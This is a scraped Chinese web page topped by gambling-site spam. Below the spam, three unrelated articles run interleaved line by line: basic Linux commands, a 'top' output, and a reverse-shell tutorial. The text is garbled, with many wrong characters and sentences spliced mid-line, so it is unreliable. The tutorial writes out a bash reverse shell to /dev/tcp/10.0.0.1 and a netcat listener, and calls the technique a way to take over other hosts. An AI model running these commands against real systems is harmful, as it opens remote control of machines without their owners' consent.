澳门新葡亰娱乐网站-www.142net-欢迎您

澳门新葡亰娱乐网站是因为你还没有找到一条正确的致富之路,www.142net是将所有的游戏都汇集在一起的官方平台,因为澳门新葡亰娱乐网站这个网站当中有着大量的游戏攻略,托IP定位技术,传达终端直接到达的精准传播方式。

关于Linux的反弹shell命令的解析,Shell基础命令

来源:http://www.bhtsgq.com 作者:计算机知识 人气:96 发布时间:2019-05-13
摘要:关于Linux的反弹shell命令的解析,Shell基础命令。前言 TOP是贰个动态展现进程,即能够因此用户开关来不断刷新当前状态.假使在前台实行该命令,它将独占前台,直到用户终止该程序结束.比

关于Linux的反弹shell命令的解析,Shell基础命令。前言

TOP是贰个动态展现进程,即能够因此用户开关来不断刷新当前状态.假使在前台实行该命令,它将独占前台,直到用户终止该程序结束.比较确切的说,top命令提供了实时的对系统管理器的景况监视.它将展现系统中CPU最“敏感”的义务列表.该命令能够按CPU使用.内部存款和储蓄器使用和试行时间对职分展开排序;而且该命令的大队人马特性都能够由此交互式命令或然在民用定制文件中开始展览设定.

壹.日期和时间:date cal
date命令告诉系统突显时间和日期。
cal命令告诉系统来得上一个月日历。
而cal 二〇一〇则展现2010年的日历。


top - 12:38:33 up 50 days, 23:15,  7 users,  load average: 60.58, 61.14, 61.22

明天在看spark stream的sample样例的时候看看linux的万金油命令nc。寻觅相关的从头到尾的经过突然开采一个很风趣的用途正是反弹shell.上面大家就来说讲反弹shell

二.查看登入系统的用户:who
咱俩得以用who查看当前登入体系的具备用户的音信。
也能够用who am i命令拿到自身的新闻。

当大家在渗透Linux主机时,反弹四个互动的shell是丰硕有供给的。在物色引擎上查找关键字“Linux 反弹shell”,会油但是生一大堆相关作品,可是其内容不仅仅雷同,而且都可是是报告大家试行那几个命令就能够反弹shell了,却未有1篇小说介绍那几个命令毕竟是哪些兑现反弹shell的。既然大咖们无心科学普及,那本人就不得不自个儿入手了。本文就来钻探一下有关命令达成的法则。

Tasks: 203 total,  60 running, 139 sleeping,   4 stopped,   0 zombie

一. 什么是反弹shell

三.显示字符:echo
echo命令在顶峰上海展览中心示键入在命令行中的其他任何内容,举个例子:
$ echo hello
hello

 

Cpu(s)  : 27.0%us, 73.0%sy,  0.0%ni,  0.0%id,  0.0%wa,  0.0%hi,  0.0%si,  0.0%st

大约的话正是A主机可以透超过实际践B主机上的吩咐并且把重回值都回到到A上。

四.列出文件清单:ls
ls命令列出了目录中留存的文件。
ls -a命令列出目录中留存的持有文件,包含隐藏的文件。
ls -l命令列出目录中文件的详细新闻。
ls /usr命令列出/usr目录中存在的文件。

Bash

Mem:   1939780k total,  1375280k used,   564500k free,   109680k buffers

2. 反弹shell的用途

5.显示文件内容:cat more
cat命令用于查看文件内容,cat的参数是要查看其内容的文本名。
more命令也用于查看文件内容。


Swap:  4401800k total,   497456k used,  3904344k free,   848712k cached

本条反弹shell大部分用场是用来侵袭外人的主机。正是因为认为十分的厉害的旗帜,所以才来研究这厮

六.总计文件中单词数:wc命令
wc filename命令用于计算文件所包罗音信的行数、单词数和字符数。这里filename是文件名。
wc -l filename命令只总括文件所富含的行数。
wc -c filename命令只总括文件所含有的字符数。
wc -w filename命令只总括文件所蕴藏的单词数。

那篇作品的起因正是英特网给的Bash反弹shell的落到实处:

PID USER      PR  NI  VIRT  RES  SHR S %CPU %MEM    TIME   COMMAND                                

3. 反弹shell操作步骤

七.复制文件:cp
cp sourcefilename targetfilename用于复制文件。

bash -i >& /dev/tcp/10.0.0.1/8080 0>&1

 4338 oracle    25   0  627m 209m 207m R    0 11.0 297:14.76 oracle                                

三.壹. 在本机开启端口9090

8.重命名或移动文件:mv
mv sourcefilename targetfilename用于重命名或活动文件。

看来那短短的1行代码,正在复习Linux,自己感到优良的自家及时充满了挫败感,那都是些什么鬼。于是决定一定要搞掌握它。

 4267 oracle    25   0  626m 144m 143m R    6  7.6  89:16.62 oracle                                

nc -lk 9090 

玖.删减文件或目录:rm rmdir
rm filename用于删除文件。
rmdir dirname用于删除目录,注意:rmdir命令只能删除空目录,使用rmdir删除目录此前务必先把目录内文件全体去除。
rm -r dirname删除3个目录及其下边全体文件。

首先,bash -i是开荒八个互为的bash,那么些最简便。大家先跳过“>&”和“0>&1”,那八个是本文着重,等会再说。先来讲“/dev/tcp/”。

 3458 oracle    25   0  672m 133m 124m R    0  7.1   1283:08 oracle                                

三.二. 在供给被调整的机械上实施如下两种命令中的一种就能够

拾.开立目录:mkdir
mkdir dirname命令创立目录dirname。

 /dev/tcp/是Linux中的叁个不一致平时设备,张开这几个文件就一定于发生了二个socket调用,建构叁个socket连接,读写这些文件就也正是在那几个socket连接中传输数据。同理,Linux中还设有/dev/udp/。

 3478 oracle    25   0  672m 124m 115m R    0  6.6   1272:30 oracle                                

bash -i >& /dev/tcp/10.0.0.1/9090 0>&1 

1一.创办3个文件能够用如下命令:
vi f.txt
cat > foo.txt

要想打听“>&”和“0>&1”,首先大家要先通晓一下Linux文件讲述符和重定向。

 3395 oracle    25   0  672m 122m 113m R    0  6.5   1270:03 oracle                                 

三.3. 在本机刚才实践nc -lk 9090命令行上边输入必要被决定的主机的指令就能够

12.体现专门的工作目录:pwd
pwd命令用于告诉用户当前职业目录名字

linux shell下常用的公文讲述符是:

 3480 oracle    25   0  672m 122m 109m R    8  6.4   1274:13 oracle                                

图片 1

1三.转移工作目录:cd
cd ..退换工作目录到上一级目录。
cd document更换目录到当前目录下的document目录(绝对路线)。
cd /usr改换工作目录到根目录下的usr目录(相对路线)。

一.  正式输入   (stdin) :代码为 0 ,使用 < 或 << ; 

 3399 oracle    25   0  672m 121m 110m R    0  6.4   1279:37 oracle                                

4. 原理

14.链接文件或目录:ln
ln from to
ln /home/user/document/t.sh /home/t把公文t.sh链接到文件t,那是硬链接。硬链接供给链接文件必须在同1个文件系统内。删除3个链接文件不会使另三个文本被剔除。
若是要链接分裂文件系统的文本,须求加快-s选项,那样能够创设二个标记化链接。符号化链接指向起始文件,假诺开端文件被删除,该符号化链接就不起作用了。

二.  正规输出   (stdout):代码为 1 ,使用 > 或 >> ; 

 4261 oracle    25   0  634m 100m  99m R    0  5.3  86:13.90 oracle                                

  1. A主机开启9090端口的tcp服务
  2. B主机连接到A主机的9090的tcp服务
  3. A主机通过tcp服务把命令发到B主机
  4. B主机读取命令并且在bash中实践
  5. B主机把施行结果发给A主机

图片 2

三.  正式错误输出(stderr):代码为 二 ,使用 二> 或 二>>。

25737 oracle    25   0  632m  81m  74m R    0  4.3 272:35.42 oracle                                

诸如此类就足以在A主机中'嗤笑'B主机了

过多材料都会告知大家,二>&一是将标准错误输出合并到标准输出中,不过那八个暗记具体要什么样晓得吧?笔者刚初叶一直将贰>看做标准错误输出,将&看做and,将一看做正经输出。那样敞亮好像也挺对,可是倘假若如此的话0>&一又该怎么样知道啊?

 7072 oracle    25   0  626m  72m  71m R    0  3.8   6:35.68 oracle                                

上面珍视来了

本文由澳门新葡亰发布于计算机知识,转载请注明出处:关于Linux的反弹shell命令的解析,Shell基础命令

关键词: linux 系统 shell 命令

最火资讯